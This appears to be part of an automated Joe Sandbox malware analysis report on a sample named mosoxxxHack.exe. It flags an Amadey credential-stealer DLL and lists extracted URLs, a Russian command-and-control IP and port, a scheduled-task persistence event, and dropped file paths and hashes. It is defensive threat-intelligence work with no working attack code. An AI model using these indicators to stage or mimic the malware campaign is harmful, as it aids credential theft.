http://tempuri.org/Endpoint/SetEnviron	mosoxxxHack.exe, 00000001.00000002.365082408.000000000353E000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.comoitu	a.exe, 00000011.00000002.405780557.00000000011A7000.00000004.00000040.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_shockwave	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
http://forms.rea	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/EnvironmentSettingsResponse	mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://ns.ado/1YMq08	mosoxxxHack.exe, 00000001.00000003.326766040.0000000008EB1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_wmp	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers?	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false		high
https://support.google.com/chrome/answer/6258784	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
http://tempuri.org/Endpoint/EnvironmentSettings	mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/soap/envelope/	mosoxxxHack.exe, 00000001.00000002.362638190.000000000315D000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_flash	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
http://www.tiro.com	drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://cdn.discordapp.com(	mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.goodfont.co.kr	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://support.google.com/chrome/?p=plugin_java	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
http://tempuri.org/Endpoint/VerifyUpdateResponse	mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://go.micros	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://cdn.discordapp.com4	mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netD	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://api.ipify.orgcookies//settinString.Removeg	mosoxxxHack.exe, 00000001.00000002.359931593.00000000027E0000.00000004.00000001.sdmp	true	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/fault	mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	false		high
http://cdn.discordapp.com	mosoxxxHack.exe, 00000001.00000002.362925140.00000000031A1000.00000004.00000001.sdmp	false		high
https://support.google.com/chrome/?p=plugin_divx	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
http://tempuri.org/0	mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://ipinfo.io/ip%appdata%	mosoxxxHack.exe, 00000001.00000002.359931593.00000000027E0000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	a.exe, 00000011.00000002.405780557.00000000011A7000.00000004.00000040.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
http://91.142.79.35:13400	mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous	mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	false		high
http://ns.adobe.cobjYMq08	mosoxxxHack.exe, 00000001.00000003.326766040.0000000008EB1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://helpx.ad	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Endpoint/CheckConnect	mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
https://api.ip.sbP	mosoxxxHack.exe, 00000001.00000002.362638190.000000000315D000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://get.adob	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false		high
http://ns.adobe.c/gYMq08	mosoxxxHack.exe, 00000001.00000003.326766040.0000000008EB1000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://service.real.com/realplayer/security/02062012_player/en/	mosoxxxHack.exe, 00000001.00000002.365271341.0000000003591000.00000004.00000001.sdmp	false		high
http://tempuri.org/Endpoint/GetUpdatesResponse	mosoxxxHack.exe, 00000001.00000002.362525513.0000000003111000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	a.exe, 00000011.00000002.424805140.0000000005C00000.00000002.00000001.sdmp, drbux.exe, 0000001A.00000002.501834007.00000000063A0000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
109.234.32.63	x-vpn.ug	Russian Federation	48282	VDSINA-ASRU	false
162.159.135.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
91.142.79.35	unknown	Russian Federation	48720	VTSL1-ASRU	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	468922
Start date:	20.08.2021
Start time:	17:07:55
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 16m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	mosoxxxHack.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	41
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@28/36@6/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 2.9% (good quality ratio 2.9%) Quality average: 100% Quality standard deviation: 0%
HCA Information:	Successful, ratio: 66% Number of executed functions: 87 Number of non-executed functions: 58
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 93.184.220.29, 23.211.6.115, 23.211.4.86, 20.49.157.6, 104.26.13.31, 104.26.12.31, 172.67.75.172, 40.112.88.60, 20.50.102.62, 80.67.82.211, 80.67.82.235, 20.54.110.249 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report creation exceeded maximum time and may have missing behavior and disassembly information. Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/468922/sample/mosoxxxHack.exe

Simulations

Behavior and APIs

Time	Type	Description
17:09:28	API Interceptor	145x Sleep call for process: mosoxxxHack.exe modified
17:10:12	API Interceptor	1x Sleep call for process: a.exe modified
17:10:35	API Interceptor	357x Sleep call for process: drbux.exe modified
17:10:47	Task Scheduler	Run new task: drbux.exe path: C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe
17:10:58	API Interceptor	17x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\ca82a716069a53\cred.dll Download File
Process:	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3072:eeZmogDk+IWT1+LAAUr8SpQMQ2TRvpAlLEE8G9:eeZkgHWmAKcRvml
MD5:	E6B5572E56E33102AB37332767D95952
SHA1:	5866B15B2985B7F53D1D44D5E6899BEB631C15A1
SHA-256:	A92DBFD52B23A42020E4470FFA8B3DD1199ACFAD7A84DAE298A047B904F31710
SHA-512:	1CEF3BF717247C87EFED9F5467EE733584B83126CF6C18FAE6D187A8BB5666AD65DC16F0C93F120EC45362E7F3C0860DD66F6030574FAF99F02583253BBFDB34
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\ProgramData\ca82a716069a53\cred.dll, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Metadefender, Detection: 63%, Browse Antivirus: ReversingLabs, Detection: 89%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X....................@..........................@..........................................@.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..@...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\a.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\a.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:ML9E4Ks2f84jE4Kx1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MxHKXfvjHKx1qHiYHKhQnoPtHoxHhAHR
MD5:	8198C64CE0786EABD4C792E7E6FC30E5
SHA1:	71E1676126F4616B18C751A0A775B2D64944A15A
SHA-256:	C58018934011086A883D1D56B21F6C1916B1CD83206ADD1865C9BDD29DADCBC4
SHA-512:	EE293C0F88A12AB10041F66DDFAE89BC11AB3B3AAD8604F1A418ABE43DF0980245C3B7F8FEB709AEE8E9474841A280E073EC063045EA39948E853AA6B4EC0FB0
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\drbux.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1314
Entropy (8bit):	5.350128552078965
Encrypted:	false
SSDEEP:	24:ML9E4Ks2f84jE4Kx1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MxHKXfvjHKx1qHiYHKhQnoPtHoxHhAHR
MD5:	8198C64CE0786EABD4C792E7E6FC30E5
SHA1:	71E1676126F4616B18C751A0A775B2D64944A15A
SHA-256:	C58018934011086A883D1D56B21F6C1916B1CD83206ADD1865C9BDD29DADCBC4
SHA-512:	EE293C0F88A12AB10041F66DDFAE89BC11AB3B3AAD8604F1A418ABE43DF0980245C3B7F8FEB709AEE8E9474841A280E073EC063045EA39948E853AA6B4EC0FB0
Malicious:	false
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\mosoxxxHack.exe.log Download File
Process:	C:\Users\user\Desktop\mosoxxxHack.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2502
Entropy (8bit):	5.3347050065951125
Encrypted:	false
SSDEEP:	48:MIHKmfHK5HKXAHKdHKBSTHaAHKzvRYHKhQnoPtHoxHImHKhBHKoHaHZHDJHxLHGu:Pqaq5qXAqdqslqzJYqhQnoPtIxHbqLqt
MD5:	03F72E6973BADD0616F444D3B887568D
SHA1:	6F8D80FC342AF063E5CA5D8A7783AC871B7BC509
SHA-256:	31726E4B807367956738F6EA959D8F19FE2E543E0FBCB564FDFACFF008BEBC40
SHA-512:	3CFFA6EAE78C4B4BAD7AF59FCAFF270F3B3DCE6D262352C97FDA90352449B2627E66F0492615C0D043EF0233CE49927DE865C6C844DF5F7ACD23C0F5A394514F
Malicious:	true
Reputation:	unknown
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..2,"System.ServiceModel.Internals, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\clp[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	24576:Vprfu3xm6KZazEzTZQFnW+VeOMZnczaQljdQuJt2KwbZ9:LaY6NgJQtWsynczaQl9Bw
MD5:	C72011B5EB1E01CE1C5B901895F78141
SHA1:	6E43C75EE865F3D3D00746B3CA5A86944D73B0B4
SHA-256:	74F264FC3E736A2BDD62316298F3A9698CFF3EF8C2FAFD2E67D04766796F8ACE
SHA-512:	37E4AD4721FB9D34399928587B05B631C9F11167AE7368845BF77BA0B06F618800DBEB47433F0F68B6AF932E7CF2BE3A8D96B355716F2ABA9E30B1B106221B33
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 35%, Browse Antivirus: ReversingLabs, Detection: 79%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....d.a................................. ........@.. ....................... ............@.................................@...K.......t............................................................................ ............... ..H............text........ ...................... ..`.sdata..............................@....rsrc...t...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\clp[1].exe Download File
Process:	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:hn:h
MD5:	FDA44910DEB1A460BE4AC5D56D61D837
SHA1:	F6D0C643351580307B2EAA6A7560E76965496BC7
SHA-256:	933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
SHA-512:	57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
Malicious:	false
Reputation:	unknown
Preview:	0....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred[1].dll Download File
Process:	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3072:eeZmogDk+IWT1+LAAUr8SpQMQ2TRvpAlLEE8G9:eeZkgHWmAKcRvml
MD5:	E6B5572E56E33102AB37332767D95952
SHA1:	5866B15B2985B7F53D1D44D5E6899BEB631C15A1
SHA-256:	A92DBFD52B23A42020E4470FFA8B3DD1199ACFAD7A84DAE298A047B904F31710
SHA-512:	1CEF3BF717247C87EFED9F5467EE733584B83126CF6C18FAE6D187A8BB5666AD65DC16F0C93F120EC45362E7F3C0860DD66F6030574FAF99F02583253BBFDB34
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred[1].dll, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Metadefender, Detection: 63%, Browse Antivirus: ReversingLabs, Detection: 89%
Reputation:	unknown
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................X....................@..........................@..........................................@.......&.... ..............................................................................................................CODE................................ ..`DATA................................@...BSS......................................idata..&...........................@....edata..@...........................@..P.reloc..............................@..P.rsrc........ ......................@..P.............@......................@..P................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	9315
Entropy (8bit):	4.926871066777065
Encrypted:	false
SSDEEP:	192:cdcU6Clib4exoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smGC:cib4/BVoGIpN6KQkj2Wkjh4iUxedmibY
MD5:	C1E3A498F811D41B650C1F39D8B5F704
SHA1:	308CDF1E36C1B8B6FA1B6CA675F1562739A8B6B1
SHA-256:	9CCE6920E845B0042186713062F13EB454CD15B9281BDD4992FB6D8FCDCD830C
SHA-512:	A3545698BE830CAE00A5E95A402B8E271189F0C116370CF76AEEDECC1FB2976EAE8D496088B8D57EE17F279614AF08DACCB7EAC0C14C54BEB4142BFAD779E4C2
Malicious:	false
Reputation:	unknown
Preview:	PSMODULECACHE......w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package........Find-Package........Install-PackageProvider........Import-PackageProvider........Get-PackageProvider........Register-PackageSource........Uninstall-Package........Find-PackageProvider........D..8.......C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1........Get-OperationValidation........Invoke-OperationValidation........PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command..

C:\Users\user\AppData\Local\Temp\152138533219 Download File
Process:	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	24576:f1zG4F1zG4F1zG4F1zG4F1zG4F1zG4F1zG4F1zG4F1zG4F1zG4F1zG4F1zG4F1za:Nz3jz3jz3jz3jz3jz3jz3jz3jz3jz3jm
MD5:	CCD7C521738DE801C852A3351CF64218
SHA1:	9C9EC76756634AD48DFD75AE45B29B2855171FE9
SHA-256:	EFF61CFDCDDB0E99DEF877C55F971FA1ADBFD3AFDDB55AEC054A7E3444BAFBB0
SHA-512:	331840FAFC4338DBCEB3952EB398C125C0D1972135480F7FA2CD4708FD170725475BF00A98D2974EA51B071C9EE64F76F232F412BF3727E3EBBB94DB3B70A69C
Malicious:	false
Reputation:	unknown
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.M.!.l7.~S....."SW.^..c......^s........u,-n....A..?.2.....l.(.?....7..~.q$.f..1\.q[.....oS:.gOY".....f-%.P.b.Z......../.....)f..9^v..H .....U.J.L4k)J..c...^...<...................T........y.....5..}......

C:\Users\user\AppData\Local\Temp\15213853321935212556 Download File
Process:	C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe
File Type:	empty
Category:	dropped
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3::
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	unknown
Preview:

C:\Users\user\AppData\Local\Temp\8a643770bf\drbux.exe Download File
